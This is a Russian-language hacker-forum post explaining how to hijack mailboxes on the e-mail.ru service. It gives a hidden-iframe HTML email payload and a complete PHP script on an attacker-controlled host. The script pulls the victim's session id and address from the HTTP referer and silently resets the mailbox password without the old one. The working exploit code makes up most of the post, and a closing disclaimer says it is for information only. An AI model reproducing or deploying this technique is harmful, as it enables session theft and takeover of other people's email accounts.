Форум АНТИЧАТ - Захват ящика на e-mail.ru

В продолжении обзора багов во второстепенных почтовых серверах рунета...:

Сервер не использует cookie, идентификация пользователя осуществляется только по id.
Собственно сам баг заключается в том, что пароль к ящику можно изменить, не зная старого пароля.
Сервер не фильтрует тег iframe, что позволяет нам встроить в страницу свой скрипт на php, на который передаётся referer, из которого мы и вырежем идентификатор сессии.
Посылаем жертве письмо в html формате вида :

Код HTML:

<iframe src="http://adres_skripta/skript.php" height=0 width=0 scrolling=no frameborder=no></iframe>

Используем передачу данных с помощью метода GET.
skript:

PHP код:


		
			
<?

$nachalo=strpos("$HTTP_REFERER","@e-mail.ru_")+11; // ищем номер позиции, с которой начинается id

$konec=strpos("$HTTP_REFERER","&fld="); // ищем номер позиции, на которой заканчивается id

$dlina=$konec-$nachalo; // получаем длину id

$id=substr("$HTTP_REFERER","$nachalo","$dlina"); // вырезаем id из referer

// Для того чтоб не изменять каждый раз скрипт мы будем  вырезать ещё и адрес мыла

$nachalo2=strpos("$HTTP_REFERER","utoken=")+7;

$konec2=$nachalo-11;

$dlina2=$konec2-$nachalo2;

$milo=substr("$HTTP_REFERER","$nachalo2","$dlina2");



echo "<html>

<iframe src=http://www.e-mail.ru/scripts/netauth.dll?cmd=passwd1&utoken={$milo}@e-mail.ru_{$id}&show=passwd.tpl&pass=PAROL&repass=PAROL></iframe>

</html>";

// PAROL - это пароль каторый надо установить

?>

Таким образом, уязвимость браузеронезависима

P.S. Изменяя таким образом пароль, у ящика становится 2 пароля (старый действителен до тех пор, пока не будет введён новый)

P.SS ДАННАЯ ИНФОРМАЦИЯ НОСИТ ЧИСТО ПОЗНОВАТЕЛЬНЫЙ ХАРАКТЕР. НЕ ПРИМЕНЯЙТЕ ЕЁ.

Автор: Mayor